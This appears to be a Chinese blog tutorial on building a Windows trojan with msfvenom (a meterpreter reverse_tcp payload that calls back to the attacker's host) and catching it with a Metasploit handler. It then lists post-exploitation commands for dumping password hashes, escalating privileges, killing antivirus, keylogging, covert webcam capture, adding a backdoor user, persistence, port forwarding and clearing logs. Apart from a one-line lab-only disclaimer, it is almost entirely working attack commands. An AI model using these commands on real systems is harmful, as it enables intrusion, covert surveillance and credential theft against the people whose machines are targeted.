Kali生成windows木马程序
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
一、生成windows执行木马程序
-p windows/x64/meterpreter/reverse_tcp //载入64位payload攻击载荷,如需32位把x64去掉即可
lhost=192.168.2.129 //设置本机kali的IP地址
lport=6666 //设置一个监听端口,可以随意,未被占用即可
-f exe //定义此文件的类型为exe
-o /home/mm.exe //生成木马程序到home目录下且命名为mm.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f exe -o /home/mm.exe
二、进入msfconsole进行监听目标上线
msfconsole //进入框架
use exploit/multi/handler //载入模块
set payload windows/meterpreter/reverse_tcp //加载攻击负载核
set lhost 192.168.2.129 //设置本地监听地址,和生成的木马地址一致
set lport 6666 //设置本地监听端口,和生成的木马地址一致
run / exploit //开始执行,等待目标上线
三、目标运行木马
当目标运行该木马程序,kali监听成功就会变成meterpreter
四、后渗透
Post后渗透模块
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志
本章内容就讲解如上,更多的内容需要自行深入研究。
Kali生成windows木马程序相关推荐
- MSF生成windows木马
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom ...
- 2021-12-09 使用kali生成木马,渗透Windows系统
本文章仅供学习和参考! 欢迎交流~ 目录 一.实验题目:使用kali生成木马,渗透Windows系统 二.实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三.实验环境 ...
- VS2010 win32项目windows窗体程序 向导生成代码解析
目录: 1.Win32项目的windows窗体程序的向导生成了如下代码 2.手工生成代码如下 3.当消息队列中没有消息需要处理,我们可以利用这段时间处理我们自己的任务 1.Win32项目的window ...
- nc扫描端口-curl-手动查杀木马过程之生成木马程序病原体并自动运行
实验环境 RHEL6 本节所讲内容: 22.1 使用nc扫描端口 22.2 curl 查看web服务器类型 22.3 手动查杀木马过程之生成木马程序病原体 22.4 手动查杀木马过程之让木马程序自动运 ...
- 手机android.sys木马,使用kali生成木马入侵安卓手机
大家好,我是T0reAd 今天给大家带来的是使用kali生成 行动开始 先查看kali的ip,我的是1.114 然后输入命令:msfvenom -p android/meterpreter/rever ...
- python 打卡程序_python获取微信企业号打卡数据并生成windows计划任务
由于公司的系统用的是Java版本,开通了企业号打卡之后又没有预算让供应商做数据对接,所以只能自己捣鼓这个,以下是个人设置的一些内容,仅供大家参考 安装python python的安装,这里就不详细写了 ...
- Windows系统中防止病毒木马程序的几种方式
Windows系统中防止病毒木马程序的几种方法 1. BIOS防病毒入侵 在开机时,按F2或F8键进入BIOS,Advanced BIOS Features–>Virus Warning–> ...
- msfconsole之制作windows木马并成功获取shell
msfconsole之制作windows木马并成功获取shell 一.工具简介 msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一 ...
- kali metasploit 制作后门程序远程操控基本使用方法
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_t ...
最新文章
- Redis重新连接弹性
- Rabbitmq 极简实现
- Python Django模板页面自定义过滤器实现md语法及字符串切割代码示例
- 【公众号系列】SAP的新零售
- redhat linux 5 nfs
- oracle动态语句打开游标,Oracle动态语句中返回游标
- EJB3.0学习笔记--SOAP-AXIS--深入Soap引擎
- 计算机ck,CKplayer
- 斐波那契数列(经典兔子繁殖问题)
- 未来战警 中的计算机词汇,计算机常用单词词汇
- 药物中毒急救 matlab
- java试题汽车接口_Java接口和包的实现之小汽车实例
- TOEFL战地手记听力FAQ
- 淘宝宝贝详情页的优化技巧
- win10控制台打开远程桌面连接
- CSS3 制作旋转的大风车
- 蓝桥杯Java必备基础知识总结大全【3W字】持续更新中
- 磁盘被格式化了的文件恢复办法
- travisscott多高_如何评价说唱歌手Travis Scott ?
- 大衣哥柳暗花明又一村,传和合国际收购孟文豪《火火的情怀》版权